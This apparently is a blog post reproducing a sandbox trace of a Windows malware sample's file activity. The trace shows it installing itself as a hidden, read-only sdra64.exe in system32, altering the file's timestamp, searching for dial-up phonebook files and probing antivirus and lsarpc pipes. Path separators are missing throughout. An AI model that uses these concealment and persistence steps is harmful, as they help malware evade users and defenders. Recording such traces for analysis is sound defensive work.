Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: c:autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:autoexec.bat (OPEN_EXISTING)
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Find File: C:WINDOWSsystem32Ras*.pbk
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Create/Open File: DeviceRasAcd (OPEN_ALWAYS)
Open File: C:Windowslogfile32.txt (OPEN_EXISTING)
Create File: C:Windowslogfile32.txt
Open File: .PIPEROUTER (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:DOKUME~1ADMINI~1LOKALE~1Temp ()
Find File: C:DOKUME~1ADMINI~1LOKALE~1Temptmp9.tmp
Open File: .pipe_AVIRA_2108 (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Set File Attributes: C:WINDOWSsystem32sdra64.exe Flags: (FILE_ATTRIBUTE_ARCHIVE SECURITY_ANONYMOUS)
Delete File: C:WINDOWSsystem32sdra64.exe
Copy File: C:DOKUME~1ADMINI~1LOKALE~1Temptmp9.tmp to C:WINDOWSsystem32sdra64.exe
Set File Attributes: C:WINDOWSsystem32sdra64.exe Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:WINDOWSsystem32sdra64.exe (OPEN_EXISTING)
Open File: C:WINDOWSsystem32ntdll.dll (OPEN_EXISTING)
Set File Time: C:WINDOWSsystem32sdra64.exe
Set File Attributes: C:WINDOWSsystem32sdra64.exe Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_READONLY SECURITY_ANONYMOUS)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .pipe_AVIRA_2108 (OPEN_EXISTING)
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftSearchDataTempusgthrsvc*.*
Delete File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftSearchDataTempusgthrsvcPerflib_Perfdata_7c.dat
Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
Open File: c:Dokumente und EinstellungenAdministratorntuser.ini (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .pipe_AVIRA_2108 (OPEN_EXISTING)
Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)

Categories: Uncategorized
Previous post
Next post